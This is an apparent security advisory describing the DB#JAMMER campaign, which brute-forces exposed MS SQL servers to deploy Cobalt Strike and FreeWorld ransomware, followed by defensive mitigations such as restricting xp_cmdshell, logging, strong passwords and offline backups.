Oasis Ticket Sales Scams: How to Stay Safe
During our weekly meetings with the banking industry and Police Scotland, we continue to see a significant increase in ticket scams over the last three…
DB#JAMMER Campaign Exploiting Vulnerable MS SQL Servers to Disseminate Cobalt Strike and FreeWorld Ransomware
Overview
A concerning campaign known as “DB#JAMMER” has recently emerged, drawing the attention of security researchers. In this evolving threat landscape, hackers are capitalising on insecurely configured Microsoft SQL (MS SQL) servers to execute attacks that deliver both Cobalt Strike and FreeWorld ransomware. Securonix initially identified this campaign, noting its distinctive use of tooling infrastructure and payloads, coupled with remarkable speed in execution. Furthermore, DB#JAMMER’s threat level is assessed as medium to high due to indications that the hackers are targeting more than just MS SQL servers.
Attack Techniques
The hackers’ arsenal includes enumeration tools, credential theft utilities, and ransomware and remote access trojan (RAT) payloads. The initial breach involves brute-force attacks directed at MS SQL servers. Once inside, the attackers enumerate databases and exploit the xp_cmdshell configuration option to gather reconnaissance data and execute shell commands. Subsequently, the hackers disable system firewalls and establish persistence by employing remote SMB shares for file transfers, along with the installation of malicious tools, such as Cobalt Strike. This groundwork lays the foundation for the deployment of AnyDesk software, which, in turn, facilitates the installation of FreeWorld ransomware. Lateral movement is also a part of their strategy, as they attempt to spread malicious software throughout the target network. Of note are the hackers’ unsuccessful attempts to establish Remote Desktop Protocol (RDP) persistence via Ngrok.
Mitigations
To safeguard against the “DB#JAMMER” campaign and similar threats, consider the following recommendations, including those from the Securonix research team:
- Reduce Attack Surface: Minimise the exposure of MSSQL services to the internet to limit attack opportunities.
- Implement Appropriate Defences: In MSSQL environments, restrict the use of xp_cmdshell and implement monitoring of standard malware staging directories, such as “C:\Windows\Temp.” Additionally, deploy process-level logging, including Sysmon and PowerShell logging.
- Strengthen Passwords: Use unique and complex passwords for online-accessible MSSQL databases.
- Leverage Trusted Platforms: Instead of exposing services directly to the internet, consider using a secure access method like a Virtual Private Network (VPN).
- Regularly Patch and Update: Keep operating systems and software up to date to mitigate vulnerabilities.
- Maintain Backups: Maintain offline backups of critical data to ensure a reliable recovery option in case of a security breach.
Conclusion
The success of the malicious “DB#JAMMER” campaign underscores the vital importance of robust password management, especially for publicly exposed services. Strong, unique passwords are a fundamental defence against brute-force attacks on MS SQL servers. By following the recommendations provided by Securonix and adhering to general security best practices, organisations can fortify their defences and better shield themselves against the ever-evolving threat landscape of cyber attacks.
Related articles
Alert: Unpatched Microsoft Office Vulnerability Exposes NTLM Hashes
Microsoft has recently disclosed a significant security vulnerability affecting multiple versions of its Office suite, including Office 2016, Office 2019, Office LTSC 2021 and Microsoft…
Public Alert: Windows 11 End of Support – Action Required
Microsoft has issued an important reminder that multiple editions of Windows 11 will reach the end of their support lifecycle on 8 October 2024. This…